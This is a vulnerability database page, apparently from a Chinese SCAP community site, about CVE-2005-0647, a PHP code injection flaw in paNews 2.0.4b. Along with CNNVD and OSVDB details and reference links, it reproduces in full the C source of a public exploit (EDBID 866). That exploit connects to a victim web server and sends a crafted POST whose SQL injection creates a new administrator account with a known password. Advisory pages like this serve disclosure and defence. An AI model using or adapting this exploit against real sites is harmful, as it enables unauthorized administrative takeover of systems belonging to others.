CVE-2005-0647
CVSS5.0
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:13:25
NMCOE    

[原文]admin_setup.php in paNews 2.0.4b allows remote attackers to inject arbitrary PHP code via the (1) $form[comments] or (2) $form[autoapprove] parameters, which are written to config.php.


[CNNVD]paNews PHP代码注入漏洞(CNNVD-200505-429)

        paNews 2.0.4b中的admin_setup.php允许远程攻击者通过(1)$form[comments]或(2)$form[autoapprove]参数来注入任意PHP代码,并写入到config.php。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0647
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0647
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-429
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110969774502370&w=2
(UNKNOWN)  BUGTRAQ  20050301 Kernelpanik Labs Digest 2005-2
http://www.kernelpanik.org/docs/kernelpanik/panews.txt
(UNKNOWN)  MISC  http://www.kernelpanik.org/docs/kernelpanik/panews.txt

- 漏洞信息

paNews PHP代码注入漏洞
中危 未知
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        paNews 2.0.4b中的admin_setup.php允许远程攻击者通过(1)$form[comments]或(2)$form[autoapprove]参数来注入任意PHP代码,并写入到config.php。

- 公告与补丁

        暂无数据

- 漏洞信息 (866)

paNews 2.0b4 Remote Admin Creation SQL Injection Exploit (EDBID:866)
php webapps
2005-03-08 Verified
0 Silentium
N/A [点击下载]
/***************************************************
*                                                  *
* paNews v2.0b4                                    *
*                                                  *
* silePNEWSxpl                                     *
* This exploit utilize SQL injection for create    *
* a new user with admin privileges on paNews       *
* software system.                                 *
*                                                  *
* References:                                      *
* packetstormsecurity.org/0503-exploits/panews.txt *
                         *
*                                                  *
* coded by: Silentium of Anacron Group Italy       *
*     date: 04/03/2005                             *
*   e-mail: anacrongroupitaly[at]autistici[dot]org *
*  my_home: www.autistici.org/anacron-group-italy  *
*                                                  *
* this tool is developed under GPL license         *
* no(c) .:. copyleft                               *
*                                                  *
***************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 80                 // port of the web server

void info(void);
void sendxpl(int sock, char *argv[]);
void errsock(void);
void errgeth(void);
void errconn(void);

int main(int argc, char *argv[]){

int sock, sockconn;
struct sockaddr_in addr;
struct hostent *hp;

if(argc!=4)
  info();

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  errsock();

system("clear");
printf("[*] Creating socket             [OK]\n");

if((hp = gethostbyname(argv[1])) == NULL)
  errgeth();

printf("[*] Resolving victim host       [OK]\n");

memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);

sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
if(sockconn < 0)
  errsock();

printf("[*] Connecting at victim host   [OK]\n");

sendxpl(sock, argv);

printf("[*] Now check on\n"
      "    http://%s%s\n\n"
      "    your username: %s\n"
      "    with password: anacron\n\n",argv[1],argv[2],argv[3]);

shutdown(sock, 2);
close(sock);

return(0);

}

void info(void){

system("clear");
printf("#########################################\n"
      "# paNews v2.0b4 exploit                 #\n"
      "#########################################\n"
      "# this exploit create a new user admin  #\n"
      "# on paNews software system.            #\n"
      "# exploit coded by Silentium            #\n"
      "# Anacron Group Italy                   #\n"
      "# www.autistici.org/anacron-group-italy #\n"
      "#########################################\n\n"
      "[usage]\n\n"
      " silePNEWSxpl <victim> <path_paNews> <username>\n\n"
      "[example]\n\n"
      " silePNEWSxpl www.victim.com /panews/index.php silentium\n\n");
exit(1);

}

void sendxpl(int sock, char *argv[]){

FILE *out;
int size = 264;
out = fdopen(sock,"a");
setbuf(out,NULL);

size+=(strlen(argv[3]) * 2);

fprintf(out,"POST %s HTTP/1.0\n"
           "Connection: Keep-Alive\n"
           "Pragma: no-cache\n"
           "Cache-control: no-cache\n"
           "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
           "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
           "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
           "Accept-Language: en\n"
           "Host: %s\n"
           "Referer: http://%s%s\n"
           "Content-Type: application/x-www-form-urlencoded\n"
           "Content-Length: %d\n\n"
           "action%%3Dlogin%%26username%%3D%s%%26password%%3Danacron%%26"
           "mysql_prefix%%3Dpanews_auth%%60%%20VALUES%%20(%%22%%22,%%22"
           "%s%%22,%%22f63140655b379e65f6cd87fa3c3da631%%22,%%22"
           "hackit%%22,%%22admins%%7Ccat%%7Ccomment%%7Cnewsadd%%7Cnewsedit"
           "%%7Cprefset%%7Csetup%%22,%%22none%%22,%%22127.0.0.1%%22"
           ",1,1)%%00\n\n",argv[2],argv[1],argv[1],argv[2],size,argv[3],argv[3]);

           printf("[*] Sending exploit         [OK]\n\n");

}

void errsock(void){

system("clear");
printf("[x] Creating socket             [FAILED]\n\n");
exit(1);

}

void errgeth(void){

printf("[x] Resolving victim host        [FAILED]\n\n");
exit(1);

}

void errconn(void){

printf("[x] Connecting at victim host    [FAILED]\n\n");
exit(1);

}

// milw0rm.com [2005-03-08]
		

- 漏洞信息

15452
paNews admin_setup.php Multiple Parameter Arbitrary PHP Code Injection
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

paNews contains a flaw that may allow an attacker to inject arbitrary PHP code. The issue is due to the $$comments or $$autapprove variables in the admin_setup.php script not being properly sanitized and may allow an attacker to inject PHP code. Other variables may also be effected.

- 时间线

2005-03-01 Unknow
2005-03-01 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站